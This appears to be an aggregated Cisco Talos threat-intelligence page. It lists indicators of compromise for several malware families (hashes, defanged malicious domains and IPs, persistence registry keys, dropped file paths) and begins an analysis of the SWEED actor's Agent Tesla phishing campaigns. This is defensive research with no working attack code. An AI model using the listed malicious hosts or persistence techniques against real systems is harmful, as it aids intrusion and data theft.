**ThreatGrid**

[](<https://3.bp.blogspot.com/-wsyllq65EuI/Wk_UCwWAJ_I/AAAAAAAABlE/JxbQKg4LGq057JDIlTgUMUV6CG8EIBlBgCLcBGAs/s1600/Doc_Trojan_XMasInvoice_6412300_0_threatgrid.png>)

**Umbrella**

[](<https://3.bp.blogspot.com/-VBqCazWAjaw/Wk_UF1Z-3VI/AAAAAAAABlI/c1KdBUQeL4MHEQ1vPeDckEnyiGgrn38RACLcBGAs/s1600/Doc_Trojan_XMasInvoice_6412300_0_umbrella.png>)

**Screenshot**

[](<https://4.bp.blogspot.com/-XSt0ytvQJO4/Wk_UJfLCueI/AAAAAAAABlM/VgdxMj5I0usggoC0B74rcq-0ra-txkjAwCLcBGAs/s1600/Doc_Trojan_XMasInvoice_6412300_0_malware.png>)

* * *

### Doc.Dropper.Agent-6412231-0

#### Indicators of Compromise

**Registry Keys**

* N/A

**Mutexes**

* N/A

**IP Addresses**

* N/A

**Domain Names**

* weekendfakc[.]top

**Files and or directories created**

* N/A

**File Hashes**

* 024782b5d080879af2a7a4280d262929e85e9815b2b37e9aeb6384a26e97895e
* 0ad1db5a012d54fe11b06cf8b8822135e5285e21ab99e7ae5c8ca1892836375b
* 1283fc95f56f1f32dcfeb5ec042a53f6e0dbd05d49c5bbc892e389cfc5613d9a
* 1a5257c6cd2e03848758d9541cbf4918194ff33669029a06baee9317d1a9a527
* 211e5c8d07af1e6b61acb7af8bb1e0fefe25bee88275f2db8d53f868dc991e0e
* 23c8026cd6414fa083f83c856c9142af5905747eabb32d0d0d839e21f941bf3e
* 25191548ef2032df4acb687d940854f134de3aa738b69fc578e5397e95496afd
* 28f9a67de7f6b79b4bf66da9d114c723e16d619f6787257eff856c71b1c7047f
* 29062cd2c2d09199fc0716485e0e3a1fff880195a92c78ecd5f0e5184ac07820
* 2b24aa417d6ab02fa9f82be1a41bc8c2e5de814057ed76074e2960d74f31d2d1

#### Coverage

[](<https://4.bp.blogspot.com/-WcjQB5z7azY/WPEvFYVUpfI/AAAAAAAAA2o/9A2DqIoERHYxdyq2wats6A7E36it0gBdACLcB/s400/no-netsec.png>)

#### Screenshots of Detection

**AMP**

[](<https://1.bp.blogspot.com/-WslsEQFIdk8/Wk_UULUA-mI/AAAAAAAABlQ/V-UtGjwPYUgihs5hC1WJf_DDL_PEvBjKwCLcBGAs/s1600/Doc_Dropper_Agent_6412231_0_amp.png>)

**ThreatGrid**

[](<https://4.bp.blogspot.com/-8PRx0PfAALE/Wk_UYROiUtI/AAAAAAAABlU/r_YpWkHKku4I-yr7mZM9LZ5rPMZ7zqiXwCLcBGAs/s1600/Doc_Dropper_Agent_6412231_0_threatgrid.png>)

**Umbrella**

[](<https://2.bp.blogspot.com/-ObamQFjNPdM/Wk_UcV3nSFI/AAAAAAAABlY/FkIDvLrSVvgRJTFLGRh0eK4ABaY8a0hqgCLcBGAs/s1600/Doc_Dropper_Agent_6412231_0_umbrella.png>)

* * *

### Doc.Macro.Necurs-6412436-0

#### Indicators of Compromise

**Registry Keys**

* **<HKCU>\Software\Microsoft\Windows\CurrentVersion\RunOnce**

**Mutexes**

* Groove:PathMutex:tzanqCjN6dCs1QGzbKslin0UfIk=

**IP Addresses**

* 98[.]124[.]252[.]145

**Domain Names**

* pragmaticinquiry[.]org

**Files and or directories created**

* %TEMP%\ASPNETSetup_00001.log..doc
* \Users\Administrator\AppData\Local\Adobe\Acrobat\9.0\Updater\updater.log..doc
* \Users\Administrator\Read___ME.html
* %TEMP%\ASPNETSetup.log..doc
* \Users\Administrator\AppData\Local\Adobe\Acrobat\9.0\Updater\Read___ME.html

**File Hashes**

* a3f68a31db23b9c7312219990bfe27bf9bb7c158fde4200c0af7a985bd7ac97d
* d4a8da30821df543407bcbbc25bf2a89db3d3f5c8d49fddeddaecd3b47c111ef
* a9db16baffc0b92aacae6647952fc2d32673998fc035493d50d32bad5bceb516
* f07f747978b7d8bed904ccadbcc49f184bc16e872f22d7b53b1030bc22ebd794
* 9b48b6bc6ee491a2b180d6b353ae8f8da230f27a0cdfc1757c58a4819664b790
* 0c51e3df0b09f14e04b268102afc9342c35fcc2460c645f9c8d21b2413910d32
* 0cfdad54484cf1d4ff9be267469edefdb98e963ffabd6beeb081a208e3fca9ac
* 1c2f0a28b5c13eb2967078d947924c9a4a5f8f845d3899986df19e8a166d3ec0
* 241f83caf5c5a23a1d7adbeaa8c392da0edadff362f41bbb5727dc71887048c4
* 305790984d5ffa713794c1732eea4f83f18da6926e415a490b2fc090f2c4e8dc
* 305f855ff8d47be5cc2d57e137a436bb2e17b1783f6cc5b8302c2df56b75afd7
* 32d85f3dded85d0375965a50991ddb7b608166f51a12b297ae981348119512da
* 36fc2029280816810324e3be9cf3a4257f0dbb1a8b11eaffdbacdead863aaf44
* 3abdf9d8249e3cc7507529aec80d93551f1fcd714a61861a69c059662aa39e9f
* 495b93c1a9940e94c14063b1e52877864d54fb544a3a32e923b0530cb03c96cf
* 4c04d8aeebdd0eb1747a9a66b10e4681328a03edcbcbd0e9921c4a74367bbd08
* 580b05987531aa4ef4bed150bd51fdbbcad5f95abb63e8439e3d4bb07eb68598
* 5c4d5f6d7d0a8d4e805c1341cadf76a924aa2fe6437d432d96f103c4319e84c2
* 6e35534f8b79187dbe2fbdd1b0a21b03752a89df5981cb6fb89154eb7b34a087
* 8f36a3ebcb2714d7f6d99d8d0672bcdf16980da788331953cba52c21fde64efb
* 962beb562acef288c5ef09f14e366d7ff3f51a00dd28b3dc5c0e388c92d3c0a2
* c2f482372523031b880b7a4f1909b30b5aa20304d0a691309484ad49a0c451d5
* cab8fcbe8bce311464418e2fcd05e55353255c511e698726e009f075de82e2ea
* ce5d33fb70fc7834d8faa7749d5cedbcb6b0958105ebe94633e2daba897612ef
* d18256e9f4062259e941028c531c5219b63446a35c524ef00554c69de2110e98

#### Coverage

[](<https://4.bp.blogspot.com/-WcjQB5z7azY/WPEvFYVUpfI/AAAAAAAAA2o/9A2DqIoERHYxdyq2wats6A7E36it0gBdACLcB/s400/no-netsec.png>)

#### Screenshots of Detection

**AMP**

[](<https://3.bp.blogspot.com/-1LosH-Ljn44/Wk_UkXkLYII/AAAAAAAABlg/hTRm1r5WXiAAVvU0wNzWJqA-xLe-L00zACLcBGAs/s1600/a3f68a31db23b9c7312219990bfe27bf9bb7c158fde4200c0af7a985bd7ac97d_amp.png>)

**ThreatGrid**

[](<https://2.bp.blogspot.com/-fYjVzFkoLgQ/Wk_UpBN3YwI/AAAAAAAABlk/7lxC1be-ZUccNjiCzGvacmzVvij7WrQPwCLcBGAs/s1600/a3f68a31db23b9c7312219990bfe27bf9bb7c158fde4200c0af7a985bd7ac97d_threatgrid.png>)

**Umbrella**

[](<https://2.bp.blogspot.com/-HlZDfNDP9dw/Wk_UuOvHsRI/AAAAAAAABlo/sC3uHpHW6tQhqqZFK_fv8p7UXlV0ZcE7QCLcBGAs/s1600/a3f68a31db23b9c7312219990bfe27bf9bb7c158fde4200c0af7a985bd7ac97d_umbrella.png>)

**Screenshot**

[](<https://4.bp.blogspot.com/-oJWXLHkeJFE/Wk_UyOJ8b2I/AAAAAAAABls/367dsCLp98Q9iZN118AqlKg1vyMvjUB4QCLcBGAs/s1600/a3f68a31db23b9c7312219990bfe27bf9bb7c158fde4200c0af7a985bd7ac97d_malware.png>)

* * *

### Ppt.Downloader.CVE_2017_8759-6413368-0

#### Indicators of Compromise

**Registry Keys**

* **<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN**
  * Value: VRGTQ

**Mutexes**

* N/A

**IP Addresses**

* N/A

**Domain Names**

* u[.]teknik[.]io
* kistags[.]com
* graceland2017[.]com
* 0i3tenrainy[.]loan
* goochandhousego[.]pro
* dayi-yc[.]com

**Files and or directories created**

* %ProgramFiles%\Rfjd\confighbch.exe
* %TEMP%\dsruxkfs.0.cs
* %TEMP%\dsruxkfs.cmdline
* %TEMP%\dsruxkfs.err
* %TEMP%\i02bp4bi.0.cs
* %TEMP%\i02bp4bi.cmdline
* %TEMP%\i02bp4bi.dll
* %TEMP%\i02bp4bi.err
* %TEMP%\tmp95D4.exe
* %TEMP%\tmp970E.exe
* %AppData%\Roaming\982PQQP9\982logrc.ini
* %TEMP%\dsruxkfs.out
* %TEMP%\svchost.exe
* %AppData%\Roaming\982PQQP9\982logim.jpeg
* %AppData%\Roaming\982PQQP9\982logrv.ini
* %AppData%\Roaming\tmp.exe
* %SystemRoot%\SysWOW64\com\SOAPAssembly\http100u4teknik4io0HUKzO4png.dll
* %SystemRoot%\SysWOW64\com\SOAPAssembly\http100u4teknik4io0HUKzO4png.pdb

**File Hashes**

* 22ae9fc528b63ecfe163c2b4c472e68869e049023be009ef118c59346247082d
* 129bddde9c3cb01c69d92d9029d5da963a0dd5a72143054f9fa97471a388e9c0
* 2d92ee55d56e96822aca748c7d69344d90a663e0db77e7ddd0ce9befa54aba98
* 3894ba1250493f0798f9212fc20e96e8114dcc218850fef13979410dc63affba
* 3a26d63160a43b64ee4f4adba0a5c19cb3ee6db2dc44c0ffb7b72b621548c4f8
* 4b4efd1527b404064604707dbf7a143745d764629d6cfcc05a6c204b66238db8
* 56b951fe25e1d0266dd49eba6b127efe63c49d71063533cee2ba3bb7eac08744
* 56ede7ef1d1e5216231c847eead200bc8b5c5f8ef7ac8389b7dc5f069b37831d
* 650abb87b45b41a344c677c0d6bb6a13cbe9a66785b87a0f2ff3fb378220448c
* 72399fbb24239a2e1897132ad0e3270103c727253275009e010c74a94f36700d
* 7b58861aab0a53cac5ac90af09723703fb47fda584fc66212ff663c52a8150a4
* 7ed5fec1aabe2e91524a9a84d2c4f4d29a8da5777289023c40ffbcc7810b2ee8
* 84593a125442a9541b2992a2934f4db5cbe1a87b6e5f5edd17982e677667c53f
* 9f9217702cc1d59edc29007f745eeec78118941f3d4f99b2f664a9677867ffb6
* b28a3bd9be8ec8d9dec980896002d84e2544acb2625e1acbbe8351d57b2b6cfc
* c0ed86aab56032d1ba313aa6b5eaabcd687caa28937f56f23832206f81ec1271
* c5b450ac63234f3d23ace0379486a33788187f14b47801971ad96ace76f85410

#### Coverage

[](<https://3.bp.blogspot.com/-Uaaol5f_kuk/WRNnk9-GYDI/AAAAAAAAA80/c6qsYVz-hcM5CPhFuFQnHk3X4b1J6C6-ACLcB/s1600/amp-tg-proxy-umbrella.png>)

#### Screenshots of Detection

**AMP**

[](<https://3.bp.blogspot.com/-1khFtIe3Pxw/Wk_U7eMtU3I/AAAAAAAABlw/dxG0yB_eXfsfrO40xBOxARyQdZ8_q1pXgCLcBGAs/s1600/Ppt.Downloader.CVE_2017_8759_6413368_0_amp.png>)

**ThreatGrid**

[](<https://1.bp.blogspot.com/-Vm5iQvKfOe8/Wk_U-yy4-HI/AAAAAAAABl0/j0PUEO4IKBAwjCk1C5uBgnwQ8XfUIB9cwCLcBGAs/s1600/Ppt.Downloader.CVE_2017_8759_6413368_0_threatgrid.png>)

**Umbrella**

[](<https://1.bp.blogspot.com/-BkaueOy9oQU/Wk_VCDQsZsI/AAAAAAAABl4/uq1ZjedosKg9hcX3_tZCeO5VRuYG1TzVACLcBGAs/s1600/Ppt.Downloader.CVE_2017_8759_6413368_0_umbrella.png>)

* * *

### Win.Ransomware.PolyRansom-6413978-0

#### Indicators of Compromise

**Registry Keys**

* **<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ZSCGIYAL**
  * Value: Type
* **<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN**
  * Value: FacAQkYU.exe
* **<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ZSCGIYAL**
  * Value: Start
* **<HKLM>\SYSTEM\CONTROLSET001\SERVICES\zscgIYAL**

**Mutexes**

* \BaseNamedObjects\mMkUAokE
* Âë@
* MkUUAgkc1
* ºë@
* poAUcoMg1
* \BaseNamedObjects\lEwoEIAg
* \BaseNamedObjects\sgwQgcAM0
* ²ë@
* fusUgwwA
* oskQowMk
* ¢ë@
* \BaseNamedObjects\hYsQEUYI0
* \BaseNamedObjects\ @
* ªë@

**IP Addresses**

* N/A

**Domain Names**

* N/A

**Files and or directories created**

* %SystemDrive%\Documents and Settings\All Users\Lgwg.txt
* %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\nOowsYQI.bat

**File Hashes**

* cd32c7982ceca8711ec2f6c7ad83103db41b5d2c644b9beee07c81f92efa30a5
* 1ff90f71632162646145cd91a22fdb24683cb25e54254f9c311d54cbc633fb92
* 377a4c54239536019cef4c3fb2ed835a0142f58d64bc0bf49063440b7700a0b7
* aff6517827847137411d37bafc0aee2915e87b9d2494493c1723634ba1014792
* 38c7c22fd8526dd108422befd6fd38212ef45fb30db3272d5016fa942cd2323d
* 3ab0d96b041b994d6f32a4351120b822d39b681d2c5133f12bb507fe2fb66e19
* ca8eb5e89426e3c6771a72cffac6998abce9ca2a6011207691e47df1738cdeb6
* 8957b057803dd6369f877c359b96423b61129fa3f68257c272644e1d56c7c667
* c4471377f58643e454ef33f21dc65f696567bf8700ae120caac5086f85bfeace
* 64fac9307649854e520f733df3df40ed960650103a78b8460488319156e059cf
* 1dd699b7fdb082c35677938f6f064e02e226033f995189889799adac08811a18
* 9ca5fd8ee403b418f92118836171b72a334caeb94fae9b5b46d6246742bf1345
* 78286db82473a9f1eddba51f39333a77c2b30fb582e9fe3e71d2924e060eb273
* 7e888fabc1451dce556864690cc55e70c8236db2a7b01b8726af0a5700ebafea
* 6f15dc426b87da591d0a2d4965558a22857e2b1c8e1e6fdfe9c36c8a4b50a99c

#### Coverage

[](<https://4.bp.blogspot.com/-lMcm16MfzdA/WRTPVW_BAII/AAAAAAAAA9I/TUwW9Ai4QFAh5FURDnAbZJXWJ_Pc0etyACLcB/s1600/amp-esa-proxy-tg.png>)

#### Screenshots of Detection

**AMP**

[](<https://4.bp.blogspot.com/-eOCzoxRTSNk/Wk_VKzTp_6I/AAAAAAAABmA/1QLtMl8-BNM-L4lgUP4dUoMVj4HyXYTFQCLcBGAs/s1600/Win_Ransomware_PolyRansom_6413978_0_amp.png>)

**ThreatGrid**

[](<https://2.bp.blogspot.com/-diL68H5zf1M/Wk_VOiDel7I/AAAAAAAABmE/Pguwi7b8IrcxjsNj9xpZDeasVMkuvvuWQCLcBGAs/s1600/Win_Ransomware_PolyRansom_6413978_0_threatgrid.png>)

**Screenshot**

[](<https://3.bp.blogspot.com/-rLc6nuwMDe4/Wk_VVJWjlkI/AAAAAAAABmI/YTwLPY1KufsX8lEuwNXd6nFIHu2A3_0BACLcBGAs/s1600/Win_Ransomware_PolyRansom_6413978_0_malware1.png>)

* * *

### Win.Trojan.Generic-6414413-0

#### Indicators of Compromise

**Registry Keys**

* **<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN**
  * Value: internat.exe
* **<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN**
  * Value: Microsoft Windows Manager
* **<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND**
  * Value: Start
* **<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN**
  * Value: Microsoft Windows Manager
* **<HKU>\Software\Microsoft\Windows\ShellNoRoam\MUICache**
* **<HKU>\Software\Microsoft\Windows\CurrentVersion\Run**
* **<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List**
* **<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run**

**Mutexes**

* \BaseNamedObjects\b11
* b11

**IP Addresses**

* 220[.]181[.]87[.]80
* 69[.]49[.]96[.]16

**Domain Names**

* www[.]murphysisters[.]org

**Files and or directories created**

* \DAV RPC SERVICE
* %SystemDrive%\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\H3T7LZRL\m[1].exe
* %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\cymycvgmtt.exe
* \;Z:000000000000d46c\192.168.0.1\vm9-116\\_\DeviceConfigManager.exe
* %AppData%\winmgr.txt
* \;Z:000000000000d46c\192.168.0.1\vm9-116\autorun.inf
* %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ftoidjlwgv.exe
* \;Z:000000000000d46c\192.168.0.1\vm9-116\DeviceConfigManager.bat
* %SystemDrive%\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\H3T7LZRL\b11[1].exe
* %WinDir%\M-5050572947025827857375865240\winmgr.exe
* %TEMP%\phqghumeay
* \;Z:000000000000d46c\192.168.0.1\vm9-116\\.lnk
* %TEMP%\rgjqmvnkyr
* %TEMP%\edakubnfgu
* \;Z:000000000000d46c\192.168.0.1\vm9-116\DeviceConfigManager.vbs
* %TEMP%\gwhroqkhwu
* %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\rdwpamlgaz.bat

**File Hashes**

* 22bcff79015a6f2d450ff4713bc1a195f6333444e96e616fb070ccf885f790ad
* c06da956f726a78aff82e8c2ec2ed7989f227ac560511512fd609574685f6c4f
* e474e51a6f29b9e32702445797ef4baaa96b1e30fa3f212ae2953bbb843a559b
* c9329790645ae7404cd3c746b9a26bcd667b6c1c45f727e504d0833d04726488
* b95a5e8f1dc23677e9e700b44d014aeee127869e46af6a674f93d34da3c606d0
* f3ee9f0be76f80faaa683ef580e3f018e1e0108e5b4457bad379e99dda2c627f
* b010ae9122a8651be194c5bc3d49540d51287040f1a1f066e193835f942277a9
* d775f05eb68ce4ef44776de0ad2b3c6181ad6a99813612a1ce3cc8b453359482
* a3940c00bd3e8d07eb70cd23148d030a473f134a7aa19ff6b777862af6d5f8e3
* 2104784585c92828df37feab86fcabddf3ffdb2718dfc3718ae529ad9c4956e0
* 43d2b149b3e4fd33b03321d2bfb6980734d3725483fee21cd996f280618865d9
* 9e7ae2436474bbad1e9ce20f8fc7a294586fde89c39b3bd2e2fd257d269ca636
* 10c96fcbeee7e93309abc9616958ef214953f512f236ddff2db39f12a8f4a817
* 08c9fedfcf1100f8450ad930a55a2cbf7dcc0fa88b646da2c5916ff42565c575
* 113e003896939e85f048e528b6f50fa9e984009fe2677143c7cfaad9ee693293
* 0d136160f510d87af7edeeb1533979a5cdc1d1511528798d5871bbb88bb1f0f4
* 33fd94f82800a1f8551e73aebbbac4169c3c08cbe12c69e9fab52875d56c96bc
* 1b6651d1e43c7ff8dd291d178b8bad9fbfd1bb426d49da419ee7e4a4d7912ba1
* 1cfd3043ecc8fd7c254201fcafe6865dfdb1c0d6ccc343d0e62e1cab261fefa3
* 201c0ca83973186aab93376147f1b60d009ef13ec827d0de5d19b483d3c0f353
* 23db71997ed2f558e06232f600d3cc7b4e5eb58f18039923127c5b4fa7fec2f9
* 26f1a92cb36e4caff3fccc45fba269647410fbee71cc4f4a00e5d4c282ba01f8
* 2ab47d6d82225c62487054db91e804418060b3334531e09d96dc6d3630fa54b3
* 34ae5c841f6e992fe09979fff521d2e8367385260cf73112e79ce656e952bbb5
* 564ace4ef8e2c3aab367969748e02a0dee555733e9085fcc0a86b9f1b70fb7b3

#### Coverage

[](<https://1.bp.blogspot.com/-8-ewx032dEo/WShN7e2cmKI/AAAAAAAABAg/1zHeN8V4h-sP6aW4ev8jafnU6MW4QEE0wCLcB/s1600/no-email-security.png>)

#### Screenshots of Detection

**AMP**

[](<https://1.bp.blogspot.com/-586c8HIpYVc/Wk_VcUZpheI/AAAAAAAABmM/vnDsbXZDCDscIhN-e7_l1CmkdAtqdf9iwCLcBGAs/s1600/Win_Trojan_Generic_6414413_0_amp.png>)

**ThreatGrid**

[](<https://2.bp.blogspot.com/-2oJ3C2DXuwE/Wk_VzF1AvMI/AAAAAAAABmQ/S6REomwRJR0pFq5LQCQ-6yThXxgu9ChOgCLcBGAs/s1600/Win_Trojan_CeeInject_6414409_0_threatgrid.png>)

**Umbrella**

[](<https://4.bp.blogspot.com/-LjzaFaQTSEY/Wk_V2sSDRcI/AAAAAAAABmY/4rUB2jaZdXcutMXc_RvvnAjE3u3gT0ymgCLcBGAs/s1600/Win_Trojan_Generic_6414413_0_umbrella.png>)

* * *

### Win.Trojan.Multi-6413508-0

#### Indicators of Compromise

**Registry Keys**

* **<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN**
  * Value: Logman
* **<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS**
  * Value: load
* **<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS**
  * Value: run
* **<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS**
  * Value: ProxyServer
* **<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN**
  * Value: internat.exe
* **<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS**
  * Value: AutoDetect
* **<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS**
  * Value: ProxyOverride
* **<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\CONNECTIONS**
  * Value: DefaultConnectionSettings
* **<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN**
  * Value: Session Manager
* **<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN**
  * Value: lsm service
* **<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN**
  * Value: ClipSrv
* **<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run**
* **<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run**
* **<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CurrentVersion**
* **<HKCU>\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\**
* **<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings**
* **<HKU>\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run**

**Mutexes**

* N/A

**IP Addresses**

* N/A

**Domain Names**

* www[.]wholists[.]org

**Files and or directories created**

* %System16%\lsm.exe
* %AppData%\clipsrv.exe
* %SystemDrive%\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\lsm.exe (copy)
* %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\APPLIC~1\MICROS~1\Windows\dllhost.exe (copy)
* %SystemDrive%\Documents and Settings\Administrator\Local Settings\Application Data\spoolsv.exe
* %SystemDrive%\Documents and Settings\All Users\Microsoft\RCX2.tmp
* %SystemDrive%\Documents and Settings\Administrator\Local Settings\Application Data\RCX8.tmp
* %SystemDrive%\Documents and Settings\Administrator\Local Settings\Application Data\spoolsv.exe (copy)
* %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\APPLIC~1\MICROS~1\Windows\RCX6.tmp
* %AppData%\ieudinit.exe
* %SystemDrive%\DOCUME~1\ALLUSE~1\clipsrv.exe
* \TEMP\d0a08beb99882af4b1771426905ee556.exe
* %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\APPLIC~1\MICROS~1\Windows\dllhost.exe
* \Users\Administrator\AppData\Local\Microsoft\dllhst3g.exe
* %System16%\smss.exe
* %SystemDrive%\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\RCX4.tmp
* %WinDir%\SysWOW64\drivers\ieudinit.exe
* %SystemDrive%\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\lsm.exe
* %SystemDrive%\Documents and Settings\Administrator\Local Settings\Application Data\dllhst3g.exe
* %SystemDrive%\Documents and Settings\All Users\Microsoft\mstinit.exe (copy)
* %SystemDrive%\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\esentutl.exe
* %SystemDrive%\DOCUME~1\ALLUSE~1\clipsrv.exe (copy)
* %SystemDrive%\Documents and Settings\All Users\Microsoft\mstinit.exe
* %SystemDrive%\Documents and Settings\Administrator\Local Settings\Application Data\dllhst3g.exe (copy)
* %WinDir%\spoolsv.exe (copy)
* \Users\Administrator\AppData\Local\Microsoft\rsvp.exe
* %WinDir%\logman.exe
* %WinDir%\spoolsv.exe
* %SystemDrive%\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\esentutl.exe (copy)

**File Hashes**

* ec3075ac9775e3c41bc8227a00ef76905bbd96a62b813c99f277865ff353c5ce
* f4b6b76dec96cc9d530dd6cb64bdd743a115a12a7b03e41f7ec737e4d80b6850
* b1da876da56ba09770d594765727d167bf1a655247f094360e032a35d3d41461
* b82ebd17236c41d9e457f640a2871695326ef8014ebd71b7a5f37d8b2c3a4522
* b3f5ad44f682104d536c60832d2064f71d3261ffbf0e1555c236a36b505619d3
* a27376262110767a28e376b723caa46d3cc50d33da60029df8e7af024ff67be9
* f1b2bbf13bde9ce65cbe1cee7e3d86a61e0511f206ae74589329dc1fffc5f7e0
* 17023d977e2b041c8a1994e7ae69b65e10f7097febefc9b47817dd9f7985cd52
* e5c95545895dc13626b3f20b47fe2f0f1b5dc3915fef44c3c7a5352e95beb382
* 6d1b40fbdcad0c96c687f661469e39b7b10a0b083a9ea3c9f6bb959c284df149
* 7d1ae051d633a3ed3c0991aaa3ed63357804a80e67dd19ae5deab71e525947a6
* 799e5b77de09f7971f0187b69266e45f70e0cda170c615c604806ec2444ab89a
* 910b590e28bc72bc14c05d47a026ed56928ea8b6608f626555d955beccb719c8
* 7d326add0d36be4543317c4d14823e2cb380f7b07bacc1f893ec86bdd0b04468
* 5af23d9dedc83e1fe8c808fe62d858767dd95f2b9402fa785072cc7247a2e4c6
* bf828a8f3fb1a27532aa9f3fb0383a1ce3418f7dd52cefa4264ab2e3e941e8d9

#### Coverage

[](<https://4.bp.blogspot.com/-lMcm16MfzdA/WRTPVW_BAII/AAAAAAAAA9I/TUwW9Ai4QFAh5FURDnAbZJXWJ_Pc0etyACLcB/s1600/amp-esa-proxy-tg.png>)

#### Screenshots of Detection

**AMP**

[](<https://1.bp.blogspot.com/-m6--9aAIz0w/Wk_V7LILV5I/AAAAAAAABmc/0snf5B6GpZw0RufzwH6FqQDcFpoap9oeQCLcBGAs/s1600/Win_Trojan_Multi_6413508_0_amp.png>)

**ThreatGrid**

[](<https://3.bp.blogspot.com/-l2quuN-P8Zc/Wk_V-slpUKI/AAAAAAAABmg/heGJ4LO4lyQsppK3WIocdrSzQu38VpHNQCLcBGAs/s1600/Win_Trojan_Multi_6413508_0_threatgrid.png>)

_Threat Round Up for December 29 - January 5_ (Cisco Talos blog; published 2018-01-05, modified 2018-01-05T19:46:49; original post: http://feedproxy.google.com/~r/feedburner/Talos/~3/td0xkcgyttQ/threat-round-up-1229-0105.html; aggregator CVSS 9.3, AV:N/AC:M/Au:N/C:C/I:C/A:C)

* * *

[](<https://1.bp.blogspot.com/-Xp7Khg9MvEw/XSx4ZhVm-YI/AAAAAAAABOk/pSp5aU7SN2UfdHZ4E_QUID3-Uz1MwXMugCLcBGAs/s1600/image2.jpg>)

_By [Edmund Brumaghin](<https://www.blogger.com/profile/10442669663667294759>) and other Cisco Talos researchers._ (Cisco Talos blog; CVEs referenced: CVE-2017-11882, CVE-2017-8759; last seen 2019-07-16)

## Executive summary

Cisco Talos recently identified a large number of ongoing malware distribution campaigns linked to a threat actor we're calling "SWEED," including such notable malware as Formbook, Lokibot and Agent Tesla. Based on our research, SWEED, which has been operating since at least 2017, primarily targets its victims with stealers and remote access trojans.

SWEED remains consistent across most of its campaigns in its use of spear-phishing emails with malicious attachments. While these campaigns have featured a myriad of different types of malicious documents, the actor primarily tries to infect its victims with a packed version of Agent Tesla, an information stealer that's been around since at least 2014.
The version of Agent Tesla that SWEED is using differs slightly from [what we've seen in the past](<https://blog.talosintelligence.com/2018/10/old-dog-new-tricks-analysing-new-rtf_15.html>) in the way that it is packed, as well as in how it infects the system. In this post, we'll run down each campaign we're able to connect to SWEED, and talk about some of the actor's tactics, techniques and procedures (TTPs).

## 2017: Steganography

One of the earliest SWEED campaigns Talos identified dates back to 2017. In this attack, the actors placed droppers inside ZIP archives and attached those ZIPs to emails. The attachments usually had file names similar to "Java_Updater.zip" or "P-O of Jun2017.zip". Here's an example of an email associated with this campaign:

[](<https://1.bp.blogspot.com/-oWU68MijqXk/XSx4iC_vcXI/AAAAAAAABOo/rxXyjBR_k5EG85vC73E6ObkctJZ5ee9SACLcBGAs/s1600/image7.png>)

The attached ZIP archive contained a packed version of Agent Tesla. The packer is a .NET executable that uses steganography: it hides a second .NET executable inside an image stored in its resources and decodes it at runtime, and that second stage uses the same technique to retrieve the final Agent Tesla payload. Here's the file stored in the resource:

[](<https://1.bp.blogspot.com/-knFhuKz76_o/XSx4uSyTszI/AAAAAAAABOw/2SY0bI1VbRo7qy3jaNDS9tnXrPIbBVOVACLcBGAs/s1600/image11.png>)

And here's the algorithm used to decode the PE stored in that image:

[](<https://1.bp.blogspot.com/-9ukoUYjLSK8/XSx41F7lNII/AAAAAAAABO4/j7CWyjabgZwMMGXuGSVJ0nT4ostrlKixQCLcBGAs/s1600/image24.png>)

The decoded binary is stored in the byte array shown.

## January 2018: Java droppers

In early 2018, we observed that SWEED began leveraging Java-based droppers. As in previous campaigns, the JAR was attached directly to emails and used file names such as "Order_2018.jar". The purpose of the JAR was to obtain information about the infected system and facilitate the download of a packed version of Agent Tesla.
